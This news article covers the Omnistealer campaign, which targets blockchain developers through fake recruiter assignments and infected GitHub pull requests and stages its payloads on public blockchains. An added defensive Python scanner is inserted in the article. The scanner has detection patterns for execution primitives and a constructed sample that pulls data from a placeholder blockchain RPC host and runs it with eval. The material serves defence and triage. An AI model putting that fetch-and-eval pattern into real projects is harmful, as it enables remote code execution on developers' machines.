Omnistealer malware campaign targets developers through GitHub

DATE POSTED: March 31, 2026

A global credential-stealing operation known as Omnistealer has emerged from a GitHub repository and freelance job offers targeting blockchain developers. Security researchers indicate that Omnistealer has the potential to rival major cyberattacks like WannaCry.

The malware uses public blockchains not only for payments but also as part of its delivery system. Once activated, it extracts credentials and other sensitive information from victims’ machines, exposing several categories of data at once.

The malware’s triggering mechanism connects to the TRON or Aptos blockchains, which were chosen because transactions on them are cheap. It reads hidden transaction data to locate a reference on the Binance Smart Chain, which delivers additional malicious code. As noted by Nick Smart, chief intelligence officer at Crystal Intelligence, the “final payload” executed by Omnistealer can gather extensive information from compromised systems.

Omnistealer targets over 60 cryptocurrency wallet extensions and more than 10 password managers, and can affect browsers such as Chrome and Firefox. Investigators have linked around 300,000 stolen credentials to this operation, including data from cybersecurity firms and government agencies in the United States and Bangladesh.

The primary targets are developers and contractors, with attackers impersonating recruiters from well-known companies or posing as freelance developers. As of January, researchers had identified two common strategies. The first involves posing as recruiters who “hire” South Asian developers for test projects containing hidden malware. The second involves malicious developers submitting infected pull requests directly through GitHub.
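The two delivery patterns described above (a test project that reaches out to a blockchain and then executes what it fetched, delivered either as a recruiter’s “assignment” or as a pull request) can be screened for before the code is ever run. The script below is an added example, not code from the article or from any of the researchers it quotes: it walks a checked-out repository and flags files that combine a blockchain-SDK or RPC reference with a dynamic-execution primitive. The keyword lists, the placeholder RPC host and both sample files are constructed assumptions for illustration, not published indicators for Omnistealer.

```python
"""Heuristic triage of an unsolicited coding "test project" or pull request for
the delivery pattern the article describes: code that reads data from a public
blockchain and then executes it. Added example, not the article's or any
researcher's code. Keyword lists and samples are constructed assumptions."""
import re
import tempfile
from pathlib import Path

# Assumed vocabulary: SDK names and RPC hints for the chains the article names.
CHAIN_PATTERNS = [
    r"\btronweb\b", r"\baptos\b", r"\bbsc\b", r"\bbinance\b",
    r"\bjsonrpc\b", r"\beth_call\b", r"\bgetTransaction\b",
]
# Assumed vocabulary: primitives that turn fetched data into running code.
EXEC_PATTERNS = [
    r"\beval\s*\(", r"\bnew\s+Function\s*\(", r"\bchild_process\b",
    r"\bexec\s*\(", r"\bexecSync\s*\(", r"\bspawn\s*\(",
]
# A long hex or base64-looking literal hints at a transaction id or payload
# reference hard-coded into the project.
BLOB_PATTERN = re.compile(r"(?:0x)?[0-9a-fA-F]{64,}|[A-Za-z0-9+/]{80,}={0,2}")
CODE_SUFFIXES = {".js", ".ts", ".mjs", ".cjs", ".py"}


def score_file(text):
    """Return which chain and exec patterns hit; a file is suspicious only
    when both kinds co-occur, which keeps ordinary wallet code out of the list."""
    chain = [p for p in CHAIN_PATTERNS if re.search(p, text, re.I)]
    execs = [p for p in EXEC_PATTERNS if re.search(p, text)]
    return {
        "chain": chain,
        "exec": execs,
        "blob": bool(BLOB_PATTERN.search(text)),
        "suspicious": bool(chain) and bool(execs),
    }


def scan_tree(root):
    """Walk a repository and map relative path -> score for suspicious files."""
    root = Path(root)
    findings = {}
    for path in root.rglob("*"):
        if path.suffix not in CODE_SUFFIXES or "node_modules" in path.parts:
            continue
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue
        result = score_file(text)
        if result["suspicious"]:
            findings[path.relative_to(root).as_posix()] = result
    return findings


# Constructed sample: reads a transaction, decodes its data field and runs it.
MALICIOUS_SAMPLE = """// constructed sample, not real campaign code
const TronWeb = require('tronweb');
const tron = new TronWeb({ fullHost: 'https://tron-rpc.example' }); // placeholder host
const TXID = '0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef';
async function run() {
  const tx = await tron.trx.getTransaction(TXID);
  const stage2 = Buffer.from(tx.raw_data.data, 'hex').toString();
  eval(stage2); // data pulled from the chain becomes code on the developer's machine
}
run();
"""

# Constructed sample: an ordinary balance query with no dynamic execution.
BENIGN_SAMPLE = """// constructed sample: legitimate wallet helper
const TronWeb = require('tronweb');
const tron = new TronWeb({ fullHost: 'https://tron-rpc.example' }); // placeholder host
async function balance(addr) {
  return tron.trx.getBalance(addr);
}
module.exports = { balance };
"""


def build_sample_tree():
    """Write the two constructed samples into a temporary 'test project'."""
    root = Path(tempfile.mkdtemp(prefix="triage-"))
    (root / "scripts").mkdir()
    (root / "src").mkdir()
    (root / "scripts" / "postinstall.js").write_text(MALICIOUS_SAMPLE)
    (root / "src" / "balance.js").write_text(BENIGN_SAMPLE)
    return root


if __name__ == "__main__":
    for rel, info in scan_tree(build_sample_tree()).items():
        print(f"{rel}: chain={info['chain']} exec={info['exec']} blob={info['blob']}")
```

Run it against a freshly cloned assignment or pull-request branch before installing dependencies or executing any script; a hit is a reason to read the flagged file by hand, not proof of compromise, since the co-occurrence test is deliberately coarse and will miss payloads that are obfuscated or staged in a dependency.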

South Asia, particularly India, has been targeted for its large pool of GitHub developers and economically vulnerable workforce. Some malicious activities are traced back to IP addresses in Vladivostok, Russia, previously linked to North Korean operations.

Some cryptocurrency wallets noted in this operation match those connected to a $1.5 billion theft by the Lazarus Group, raising concerns about ongoing financial exploitation. The social-engineering tactics resemble a North Korean subset known as Contagious Interview, according to Nick Carlsen from TRM Labs.

Carlsen emphasized that financial gain remains a primary objective for North Korean cyber operations. Stolen cryptocurrencies could be used to support military programs. The massive collection of credentials may also enable the creation of convincing fake profiles, facilitating fund laundering or selling access on underground markets.

Ransom-ISAC reported that Omnistealer’s structure complicates takedown efforts, because attack components are embedded within blockchain transactions that cannot be removed and are hard to track. The organization highlighted the technique of “hiding malicious payloads within blockchain” as an emerging strategy among threat actors.
